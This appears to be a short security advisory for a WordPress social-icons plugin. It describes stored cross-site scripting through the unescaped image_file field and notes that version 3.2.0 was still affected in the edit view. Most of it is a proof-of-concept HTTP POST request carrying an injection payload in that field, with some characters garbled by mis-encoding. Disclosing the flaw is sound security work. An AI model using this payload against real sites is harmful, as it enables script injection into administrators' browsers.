The plugin does not properly escape the image_file field when adding a new social icon, allowing high privileged users to inject arbitrary javascript even when the unfiltered_html capability is disallowed. Version 3.2.0 adressed some of the issues, but was still vulnerable when clicking to edit the contaminated icon.
POST /wp-admin/admin.php?page=cnss_social_icon_add HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryntci4RWsTIt6kFWd Accept-Encoding: gzip, deflate Cookie: [Admin cookies] Connection: close ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=ā_wpnonceā 482d64ba75 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=ā_wp_http_refererā /wp-admin/admin.php?page=cnss_social_icon_add ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=ātitleā 55 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=āimage_fileā ." onerror=alert``;// ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=āurlā 1123 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=āsortorderā 4 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=ātargetā 1 ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=āactionā update ------WebKitFormBoundaryntci4RWsTIt6kFWd Content-Disposition: form-data; name=āsubmit_buttonā ė³ź²½ģ¬ķ ģ ģ„ ------WebKitFormBoundaryntci4RWsTIt6kFWdā